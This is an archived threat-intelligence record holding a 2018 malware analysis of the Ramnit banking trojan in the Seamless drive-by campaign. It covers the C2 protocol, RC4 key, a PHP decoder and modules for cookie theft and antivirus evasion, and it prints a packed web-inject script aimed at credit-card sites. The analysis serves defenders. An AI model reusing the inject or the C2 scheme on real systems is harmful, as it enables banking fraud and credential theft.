{
	"id": "000abf68-e261-415a-98c8-f24fdf7d6b8c",
	"created_at": "2026-04-06T00:10:36.548096Z",
	"updated_at": "2026-04-10T03:21:16.486864Z",
	"deleted_at": null,
	"sha1_hash": "f66604ee8c5fbbb562722e93add46a9af001b520",
	"title": "nao-sec.org",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 212555,
	"plain_text": "nao-sec.org\r\nBy 友利奈緒\r\nPublished: 2018-01-01 · Archived: 2026-04-05 19:40:10 UTC\r\nAnalyzing Ramnit used in Seamless campaign\r\n2018-01-01\r\nFirst\r\nSeamless campaign which is a Drive-by Download attack campaign uses Ramnit banking trojan. Many articles\r\nabout Seamless campaign are published. For example, Cisco Umbrella, Malware-Traffic-Analysis and traffic.moe.\r\nSeamless has been using Ramnit since it began to be observed. Once run, Ramnit injects code into the web page to\r\nsteal information such as credit cards. Ramnit is a previously reported banking trojan, but since I didn't know\r\nmuch about it, so I investigated about it.\r\nSeamless Campaign Traffic\r\nFirst, about Seamless campaign. Seamless campaign consists of the following traffic.\r\nWhen reaching Seamless's Pre-Gate from the ad network, Pre-Gate gets the user's time zone information and\r\nsends it to the server. If the user belongs to the target time zone, Pre-Gate redirects the user to Gate via several\r\nredirectors. The user reads the landing page of the RIG Exploit Kit at Gate, which attacks and sends Ramnit.\r\nSeamless is sensitive to the user's geolocation. Pre-Gate exists for each target country. For example, Pre-Gate for\r\nUSA redirect to Gate for USA and Ramnit for USA is sent.\r\nRamnit Traffic\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 1 of 12\n\nRamnit uses the original protocol when communicating with C2. Following this protocol, I try to extract the\r\nconfigs and modules from the traffic of Ramnit and C2.\r\nThis protocol uses port 443. But, not https. A simple mechanism is on tcp. Packet consists of multiple commands\r\nand data. The structure is as follows.\r\n00 ff magic number byte[2]\r\n06 00 00 00 length dword\r\ne2 command byte\r\n01 00 00 00 00 data byte[length-1]\r\nmagic number is a fixed value. Packets start with this bytes. length is the length of command and data. In other\r\nwords, strlen(command + data). command is 1 byte. There are various kinds of this.\r\n0x01 COMMAND_OK\r\n0x11 GET_DNSCHANGER\r\n0x13 GET_INJECTS\r\n0x15 UPLOAD_COOKIES\r\n0x21 GET_MODULE\r\n0x23 GET_MODULE_LIST\r\n0x51 VERIGY_HOST\r\n0xe2 REGISTER_BOT\r\n0xe8 UPLOAD_INFO_GET_COMMANDS\r\nData has three structures.\r\nchunk_0:\r\n00 magic number byte\r\n06 00 00 00 length dword\r\n01 23 45 67 89 01 RC4 encrypted data byte[length]\r\n---\r\nchunk_1:\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 2 of 12\n\n01 magic number byte\r\n00 01 00 00 data dword\r\n---\r\nchunk_2:\r\n02 magic number byte\r\n00 01 00 00 data dword\r\n00 02 00 00 data dword\r\nThe encryption key of RC4 seems to be stable. In my environment `fenquyidh` is the key.\r\nLet's look at the data using actual traffic. If you have Ramnit traffic, use it. If you do not have it, look for Ramnit\r\nand move it, or look for pcap etc. For example, if you look at the #Ramnit tag on Twitter, you will find many\r\nTweets. You will surely get Ramnit or its traffic.\r\nRamnit is banking trojan. It depends on the target country/region. For example, Ramnit used in attack campaign\r\ntargeting Japan doesn't work with IP addresses of countries other than Japan. The configs and modules that Ramnit\r\nacquires from C2 also change. This time, let's see the traffic of Ramnit for Japan. If you are not able to get the\r\ntraffic of Ramnit for Japan, please refer to this link. It seems that someone kindly released pcap ;)\r\nhttps://gist.github.com/anonymous/2d7eef0c0ffba19338afd74823d7a8c9\r\nLet's open pcap and look at the first packet.\r\n00ff4b000000e200200000000c361ffe44bc3561c50723482c1e8ccca72b6a4c\r\n161459f31cc70559b27aed4d00200000000d371cad11b93131c652704c7d1589\r\nc5a22c6f4b104758f614c2500de67cbf16\r\nWhen parsing this according to the protocol, it becomes as follows.\r\n// magic number\r\n00 ff\r\n// length\r\n4b 00 00 00\r\n// command =\u003e Register bot (send two MD5s)\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 3 of 12\n\ne2\r\n// data chunk magic\r\n00\r\n// data length\r\n20 00 00 00\r\n// data\r\n0c 36 1f fe 44 bc 35 61 c5 07 23 48 2c 1e 8c cc\r\na7 2b 6a 4c 16 14 59 f3 1c c7 05 59 b2 7a ed 4d\r\n// data chunk magic\r\n00\r\n// length\r\n20 00 00 00\r\n// data\r\n0d 37 1c ad 11 b9 31 31 c6 52 70 4c 7d 15 89 c5\r\na2 2c 6f 4b 10 47 58 f6 14 c2 50 0d e6 7c bf 16\r\nThis data is encoded with RC4. So I decode it. RC 4 is a simple algorithm, write the code.\r\n\u003c?php\r\nclass RC4\r\n{\r\npublic static function calc(string $data, string $key) : string\r\n{\r\n$s = [];\r\nfor($i = 0; $i \u003c 256; $i++)\r\n{\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 4 of 12\n\n$s[$i] = $i;\r\n}\r\n$j = 0;\r\nfor($i = 0; $i \u003c 256; $i++)\r\n{\r\n$j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;\r\nlist($s[$i], $s[$j]) = [$s[$j], $s[$i]];\r\n}\r\n$i = $j = 0;\r\n$ret = '';\r\nfor($k = 0; $k \u003c strlen($data); $k++)\r\n{\r\n$i = ($i + 1) % 256;\r\n$j = ($j + $s[$i]) % 256;\r\nlist($s[$i], $s[$j]) = [$s[$j], $s[$i]];\r\n$ret .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\r\n}\r\nreturn $ret;\r\n}\r\n}\r\n$key = 'fenquyidh';\r\n$binary1 = [\r\n'0c', '36', '1f', 'fe', '44', 'bc', '35', '61',\r\n'c5', '07', '23', '48', '2c', '1e', '8c', 'cc',\r\n'a7', '2b', '6a', '4c', '16', '14', '59', 'f3',\r\n'1c', 'c7', '05', '59', 'b2', '7a', 'ed', '4d'\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 5 of 12\n\n];\r\n$binary2 = [\r\n'0d', '37', '1c', 'ad', '11', 'b9', '31', '31',\r\n'c6', '52', '70', '4c', '7d', '15', '89', 'c5',\r\n'a2', '2c', '6f', '4b', '10', '47', '58', 'f6',\r\n'14', 'c2', '50', '0d', 'e6', '7c', 'bf', '16'\r\n];\r\n$data1 = [];\r\nfor($i=0; $i\u003ccount($binary1); $i++)\r\n{\r\n$data1[] = chr(hexdec($binary1[$i]));\r\n}\r\n$data1 = implode('', $data1);\r\n$data1 = RC4::calc($data1, $key);\r\nvar_dump($data1);\r\n$data2 = [];\r\nfor($i=0; $i\u003ccount($binary2); $i++)\r\n{\r\n$data2[] = chr(hexdec($binary2[$i]));\r\n}\r\n$data2 = implode('', $data2);\r\n$data2 = RC4::calc($data2, $key);\r\nvar_dump($data2);\r\nThe results are as follows. Ramnit is sending two MD5 values to C2. Registration is done to bot by this.\r\nstring(32) \"d5ad437b032fd239616c1d0d97a6b6eb\"\r\nstring(32) \"e4b7a6323fab5960363d771a124b6079\"\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 6 of 12\n\nThis is what automates these processes.\r\nhttps://github.com/nao-sec/ramnit_traffic_parser\r\nThis script uses tshark. If not installed, please install and set environment variables. Now, let's run the script.\r\n$ php main.php ramnit_traffic.pcap\r\n[+] REGISTER_BOT(0xe2) : output/000_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/001_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/002_e2.bin\r\n-- snip --\r\n[+] GET_INJECTS(0x13) : output/139_13.bin\r\n[+] REGISTER_BOT(0xe2) : output/140_e2.bin\r\n[+] REGISTER_BOT(0xe2) : output/141_e2.bin\r\nFiles are created in the output directory. Let's look at `064_21.bin`.\r\nThis file says \"Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\". You can see that there\r\nis MZ header below 0x120 and it is a PE file. Cutting out 0x120 or later result in the following.\r\n$ file 064_21.bin\r\n064_21.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed\r\nIt is unpacked because packed by UPX.\r\n$ upx -d 064_21.bin\r\n$ file 064_21.bin\r\n064_21.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nLooking at this DLL with IDA, you can see that it is a program that interferes with Anti-Virus software.\r\nSeveral DLL modules (067_21.bin, 070_21.bin, 073_21.bin) are downloaded like this.\r\nNext, let's see 106_15.bin. This file seems to be zip. Looking inside it was IE's cookies. There was a DLL module\r\nthat zipped the cookie, so it might be related.\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 7 of 12\n\n$ file 106_15.bin\r\n106_15.bin: Zip archive data, at least v2.0 to extract\r\n$ unzip -l 106_15.zip\r\nArchive: 106_15.bin\r\nLength Date Time Name\r\n--------- ---------- ----- ----\r\n94 2017-02-25 00:24 IE Cookies/383ZENWY.cookie\r\n0 2017-02-25 00:23 IE Cookies/container.dat\r\n114 2017-12-01 01:09 IE Cookies/DVJZAF70.cookie\r\n63 2017-02-25 00:24 IE Cookies/EB3FDKZ8.cookie\r\n101 2017-11-19 17:25 IE Cookies/EWCKIMK2.cookie\r\n114 2017-02-25 00:30 IE Cookies/Q35837OZ.cookie\r\n156 2017-05-02 20:06 IE Cookies/RTHFNUYR.cookie\r\n--------- -------\r\n642 7 files\r\nFinally, look at 139_13.bin. This is the config of the injecting code for the web page.\r\nset_url [[\"Credit card company URL\"]] GP\r\ndata_before\r\nPC_fishing*\u003c/ul\u003e\r\ndata_end\r\ndata_inject\r\n\u003cscript\u003eeval(function(p,a,c,k,e,r){e=function(c){return(c\u003ca?'':e(parseInt\r\n(c/a)))+((c=c%a)\u003e35?String.fromCharCode(c+29):c.toString(36))};if\r\n(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e)\r\n{return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 8 of 12\n\np=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('1 4={7:q(a,\r\nb){r s a==\"E\"?a.3(b):/^(F|G|H)$/i.3((s a).t())?a==b:6},u:q(a){r a.I||a.J||\r\na.8||\"\"},x:q(b){1 c=b.y||K;1 d=b.z||\"A\";1 e=6;1 f=6;1 g=[];1 h=c.L(b.v.B()\r\n);w(1 k=0;k\u003ch.9;k++){1 i=0;1 j=0;w(1 l M b){2(!/^(v|z|y|N)$/i.3(l)){j++;2\r\n(/^(8)$/i.3(l)){2(4.7(b[l],h[k].8)){i++}}p 2(/^(u)$/i.3(l)){2(4.7(b[l],4.u\r\n(h[k]))){i++}}p{w(1 a=0;a\u003ch[k].5.9;a++){2(s h[k].5[a].C!=\"O\"){1 m=h[k].5\r\n[a].C.t().B();1 n=h[k].5[a].D?h[k].5[a].D.t():h[k].5[a];2(m==l\u0026\u00264.7(b[l],\r\nn)){i++}}}}}}2(i==j){2(/^(A)$/i.3(d)){e=h[k];P}p 2(/^(Q)$/i.3(d)){f=h[k]}\r\np 2(/^(R)$/i.3(d)){1 o=g.9;g[o]=h[k]}}}r e||f||(g.9\u003e0?g:6)||6}};1 c=4.x(\r\n{\"v\":\"S\",\"8\":/T/U});2(c){c.V.W=\"X\"}',60,60,'|var|if|test|getElement|\r\nattributes|false|equals|innerHTML|length||||||||||||||||else|function|\r\nreturn|typeof|toString|innerContent|tagName|for|byAttrs|parentElement|\r\nsearchType|first|toLowerCase|nodeName|nodeValue|object|string|number|\r\nboolean|textContent|innerText|document|getElementsByTagName|in|\r\ntoJSONString|undefined|break|last|all|li|fishing|im|style|display|\r\nnone'.split('|'),0,{}));\u003c/script\u003e\r\ndata_end\r\ndata_after\r\ndata_end\r\nLooking at this configuration, URLs of many credit card companies and related companies exist. It was localized\r\nfor Japan.\r\nRamnit Modules\r\nI analyzed the modules that Ramnit downloads. All modules had data added at the beginning of the PE format.\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 9 of 12\n\nAlso, its PE file is a DLL, packed with UPX.\r\nAt the beginning of the module there is a comment like a description of the role. Most of them are similar to the\r\ninformation already analyzed by analysts.\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nhttp://www.vkremez.com/2017/08/8-10-2017-rig-exploit-kit-leads-to.html\r\nhttps://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/\r\nFor Japan\r\n[module 1]\r\nAvTrust\r\nAntivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\r\nAdd to antivirus software exception list\r\n[module 2]\r\nCookieGrabber\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 10 of 12\n\nCookie Grabber v0.2 (no mask)\r\nCompress and send cookies of browsers (firefox, chorome, opera, IE) to zip.\r\n[module 3]\r\nHooker\r\nIE \u0026 Chrome \u0026 FF injector\r\n[module 4]\r\nBrowser communication hook\r\nVNC IFSB\r\nVNC IFSB x64-x86\r\nI think it is similar to this code.\r\nhttps://github.com/gbrindisi/malware/blob/master/windows/gozi-isfb/AcDll/activdll.c\r\n[module 5]\r\nFFCH\r\nFF\u0026Chrome reinstall x64-x86 [silent]\r\nFor USA\r\nmodule 1~4 is the same. module5 had the following functions instead.\r\nFtpGrabber2\r\nFtp Grabber v2.0\r\nAnd In US IP, AZORult has been downloaded.\r\nhttps://www.hybrid-analysis.com/sample/37b66f9117a2140fa11badad967c09142860d04af9a3564bfe58527d7d7e9270\r\nIOCs\r\nhttps://github.com/nao-sec/ioc/blob/master/nao_sec/5a34bc94-1eb8-4213-9ab8-34dbc0a8010a.json\r\nFinally\r\nThe Ramnit has not changed very much for a long time. It was consistent with Symantec's contents published in\r\n2014.\r\nhttps://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-\r\nen.pdf\r\nThe configuration changes depending on the IP address, but the same module was downloaded.\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 11 of 12\n\nRamnit traffic is interesting ;)\r\nSource: http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nhttp://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html"
	],
	"report_names": [
		"analyzing-ramnit-used-in-seamless.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434236,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.pdf",
		"text": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.txt",
		"img": "https://archive.orkl.eu/f66604ee8c5fbbb562722e93add46a9af001b520.jpg"
	}
}